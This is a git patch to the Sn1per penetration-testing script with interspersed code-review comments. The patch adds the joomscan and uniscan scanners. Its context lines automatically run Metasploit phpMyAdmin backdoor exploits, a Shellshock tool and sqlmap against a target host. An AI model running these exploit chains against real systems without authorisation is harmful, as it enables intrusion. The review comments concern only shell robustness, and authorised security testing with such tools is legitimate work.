From 11b2022b26e5edaeeb8b52f3aa4073ddb60ef445 Mon Sep 17 00:00:00 2001 From: root Date: Fri, 6 May 2016 08:24:02 -0700 Subject: [PATCH] Sn1per by 1N3 @CrowdShield --- README.md | 2 ++ install.sh | 2 +- sniper | 10 ++++++++-- 3 files changed, 11 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 4f77bbe..d8b2285 100644 --- a/README.md +++ b/README.md @@ -48,6 +48,8 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.7 - Added uniscan web vulnerability scanner +* v1.7 - Added joomscan Joomla scanner * v1.7 - Improved web scan performance * v1.7 - Fixed issue with inurlbr output * v1.7 - Added remote desktop viewing for RDP connections diff --git a/install.sh b/install.sh index 146cd3b..f6cdd1e 100644 --- a/install.sh +++ b/install.sh @@ -24,7 +24,7 @@ echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per insta read answer echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET" -apt-get install xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap +apt-get install joomscan uniscan xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET" gem install rake diff --git a/sniper b/sniper index 04ccd01..1c12860 100644 --- a/sniper +++ b/sniper 
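Review bot: The exit status of the `apt-get install` line in install.sh is never checked, and this change adds `joomscan` and `uniscan` to that single transaction. apt-get normally refuses the whole install when one named package cannot be located, so if either is missing from the configured repositories none of the dependencies are installed. The script then carries on to `gem install rake`, unless `set -e` is active earlier, which the hunk does not show. Guard the call, for example `apt-get install ... || { echo "package install failed" >&2; exit 1; }`. The list also names arachni, theharvester, dnsenum and nbtscan twice, which is harmless but worth tidying while the line is being edited.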
@@ -487,9 +487,12 @@ else
 dirb http://$TARGET
 wpscan --url http://$TARGET --batch
 wpscan --url http://$TARGET/wordpress/ --batch
+ joomscan -u http://$TARGET
+ joomscan -u http://$TARGET/joomla/
 python $CMSMAP -t http://$TARGET
 python $CMSMAP -t http://$TARGET/wordpress/
- arachni http://$TARGET --output-only-positives
+ #arachni http://$TARGET --output-only-positives
+ uniscan -u http://$TARGET -qweds
 sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
 msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
 python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80
@@ -633,9 +636,12 @@ else
 dirb https://$TARGET
 wpscan --url https://$TARGET --batch
 wpscan --url https://$TARGET/wordpress/ --batch
+ joomscan -u https://$TARGET
+ joomscan -u https://$TARGET/joomla/
 python $CMSMAP -t https://$TARGET
 python $CMSMAP -t https://$TARGET/wordpress/
- arachni https://$TARGET --output-only-positives
+ #arachni https://$TARGET --output-only-positives
+ uniscan -u https://$TARGET -qweds
 sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
 msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
 python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl
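Review bot: `$TARGET` is expanded unquoted in the added `joomscan` and `uniscan` lines, in both the http hunk at -487 and the https hunk at -633. A target value containing whitespace or glob characters is therefore word-split and reaches the scanners as extra arguments; the neighbouring `sqlmap -u "http://$TARGET"` line already quotes it. Write them as `joomscan -u "http://$TARGET"` and `uniscan -u "http://$TARGET" -qweds`, and likewise for the https variants. The arachni call is commented out rather than removed, while install.sh in this commit still installs arachni and the changelog does not mention the scan being disabled, so either delete the line or add a comment saying why it is off. The enclosing `else` branch starts and ends outside both hunks.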